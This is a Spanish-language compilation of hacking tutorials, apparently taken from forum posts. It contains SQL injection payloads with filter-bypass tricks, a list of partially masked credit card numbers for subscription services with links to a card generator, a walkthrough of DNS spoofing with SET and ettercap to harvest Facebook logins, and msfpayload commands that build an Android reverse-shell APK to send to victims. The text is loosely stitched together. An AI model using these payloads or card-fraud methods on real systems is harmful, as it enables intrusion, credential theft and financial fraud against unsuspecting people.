Mipagina.php?id=12’     /*!50000uNioN*//*!50000sElEcT*/1,2,3,4,5,6--+
Si no da entonce ponemos esta

Unión all select 1,1,1,1,1,1--
Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…

php?id=1+and+1=0+order+by+1

+andHYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"+(HYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*

Mipagina.php?id=12’ /*!00000union*/select+1,2,3,4,5,6---+
Donde va la tabla 2 por ejemplo
" Mipagina.php?id=12’/*!50000uNioN*//*!50000sElEcT*/1, /*!00000concat*/(0x3c666f6e7420636f6c6f723d7265642073697a653d306d34726b6d336e2020477265657473203a2052756d6d79204b68616e202c4b616d72616e20536861682c4d616b204d616e2c4d6174746865772046657272656c6c202620616c6c20544353206d656d62657273203c2f666f6e743e,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6--+

" Muestra la table Image

Despues: Mipagina.php?id=12’/*!50000uNioN*//*!50000sElEcT*/1,(username),3,4,5,6 


Crea tu propia cuentas Eje: Netflix


Puedes Agregar y hacer lo que quieras



https://dashboard.stripe.com/
https://temp-mail.org/es/
http://www.sayapro.us/account/
http://rdd.pw/
https://bin2ccgen.com/index.php#

Compartelo para que los demas aprendan

Bin para todos 



MCIG.ORG41472021xxxxxxx7 TELMEX533609701544xxxx CCV: 377 12/16NETFLIX IP Usa533875xxxxxxxx4x 02/16 Ccv:360RKCAMS4037660021xxxxxx. 07/17. Cvv: 087PORRUAS4147 2021 68xx xxxx 12/17 339CINEMEX402766268xxxxxx35512380448xxxxxx 09/17 328JOYMIIIP USA 41472021xxxxxx9x 069 11/16MERCADOLIBRE SOLO 1504027664100xxxxxx 06/17 CCV 331SPOTIFY 2 o 3 mesesIP USA 41472021265xxxxx 069 11/16VEOTV a la 1 o 35336097011xxxx72 365 11/16NETFLIXIP USA 51535963xxxxxxxx 091 ZIP CODE 10910IP MEX 4359830002xxxxxx 337 11/17JASMIN4147400124xxxxxx 07/18 589AVAST ANTIVIRUS414720214xxx7xxx 06/16 468PAYPAL52567860xxxx92 06/16 236TORGUARD (VPN)4147202148xxxxxxDOTVPN4147202168xxxxxx 06/16 244Bershka5443687733xxxxxxCABLEMAS4027664100xxx5xxDOMINOS435983000262xxxx 338 03/18SPOTIFY USA 1 año

tecnica peligrosa y muchas siguen usandolas



Con este metodo puedes pensar hacer lo que quieras solo piensa :v

Bueno esta es una técnica muy peligrosa,cuando nos conectamos a lados públicos, en donde la conexión a wifi es libre y para miles de usuarios, por ejemplo una universidad.

el Suplantación de identidad por nombre de dominio. Se trata del falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de  nombre, es decir, resolver con una dirección IP falsa un cierto nombre NS o viceversa. Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el cache DNS de otro servidor diferente (DNS Poisoning).

ESCENARIO:
El siguiente tutorial consta de realizar un ataque conocido como DNS Spoofing, el siguiente ejemplo se basa en una red LAN con dos participantes un atacante y una victima:

Atacante:
Sistema operativo: Backtrack 5 R3

Victima:

Sistema operativo: Windows 7.

El sistema operativo de la victima es irrelevante...


LA idea principal es poder obtener la contraseña y login de su cuenta de facebook,este ejemplo se puede hacer con cualquier pagina web que deseamos solo tenemos que indicar al set y ettercap de la pagina web a clonar.

COMANDO:

Ingresamos a la siguiente ruta:

#cd /pentest/exploits/set
#./set
Se abrirá la aplicación SET para realizar ataques de tipo ingeniera social a continuación elegimos la siguientes opciones:
Seleccionamos 1: para realizar un ataque Social-Enginnering Attack

En el siguiente menú seleccionamos 2 ; Website Attack Vectors

En Multi-Attack seleccionamos la opción 3 ; Credential Harvester Attack Method para poder realizar el clonado de la pagina que deseamos atacar.
Seleccionamos opción 2 Site Cloner

En las opciones para clonar la pagina con éxito tendremos que ingresar nuestra dirección IP, con el comando ifconfig puedo obtener los datos;nuestra dirección IP y el adaptador de red que estamos ocupando en mi caso eth0,en caso de wireless se ocuparía wlan0 por defecto.

Luego de ingresar nuestra IP,nos pedirá la pagina web a la cual deseamos realizar el clonado, en caso de ejemplo ocupare facebook , pero puedes ocupar cualquier pagina web, ya sea twitter, youtube, blogger,etc.

Una vez finalizado empezara a iniciar el clonado a la pagina web, es necesario tener el servicio de apache iniciado, en caso de que no lo este, nos aparecerá el siguiente mensaje , para iniciar el servicio al cual ponemos Y.
Bueno hasta acá tenemos la configuración con éxitos para poder realizar el envenenamiento por dns ,la victima tendría que poner nuestra dirección IP en su navegador,y a continuación aparecería el mensaje de login  de Facebook.
Para que el usuario no ingrese nuestra dirección IP, ocuparemos una herramienta llamada ettetcap, su función sera que cuando el usuario ingrese a facebook se envenene automáticamente y no tenga que ingresar nuestra IP. Para ello con un editor de texto editamos la siguiente ruta/usr/local/share/ettercap/etter.dns y agregamos los siguientes parámetros ingresamos el dominio y nuestra IP como muestra la imagen.

Dominio.com A IP
*.Dominio A IP

www.dominio.com PTR IP

Guardamos y cerramos.

y para finalizar envenenamos:

ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //

Bueno cuando el usuario conectado a nuestra lan ingrese a facebook.com se envenenara automáticamente:
VICTIMA:

Victima ingresando a facebook y realizando el proceso de login:


ATACANTE:

Recibe la información de la cookies GET que captura en la lan.
bueno esto fue todo :)

Como muchos le llaman, Hackear Ordenadores..



lo primero que tenemos que hacer es crear el virus y luego enviarlo a la victima 






despues que tengamos el virus creado, solo nos queda enviarlo a la persona
haciando Ingeniería Social






esto fue un ejemplo 
entonce ya que tienes todas estas victimas infectadas  puedes hacer con todas estas victimas lo que kieras 
ya se por donde vas :D  

Ataque para Android utilizando Linux

método para Hackear android


Hola!
 En esté post aprenderás a entrar en un android , con la maravillosa herramienta llamada Metasploit , dirás  ¿Enserio? , se podría entrar en un Android, claro! Empecemos.....

1º.-Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.

2º.-Una vez hecho eso pondremos en Metasploit lo siguiente....
search Android

Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada! bien...!! Hagamos este Apk Infectada...... Para hacerlo usaremos "MsfPayload" se aria así -> 
sudo msfpayload android/meterpreter/reverse_tcp  LHOST="Tu ip/No-ip" LPORT=Puerto R > "Ruta+ Aplicación.apk"

Ejemplo : 
 sudo msfpayload android/meterpreter/reverse_tcp  LHOST=192.168.1.35 LPORT=23 R > /home/icebreaker/Escritorio/Hack.apk
Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a
msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien
escrito....Bueno una vez hecho eso, cargamos el exploit ......
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=”Su ip puesta en el backdoor” LPORT="Su puerto" E
Ejemplo:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E 


 Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... 
O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para
ver los comandos que nos brinda Meterpreter ,para esté dispositivo...
Bueno hay pueden , ir probando ya tienen su dispositivo infectado!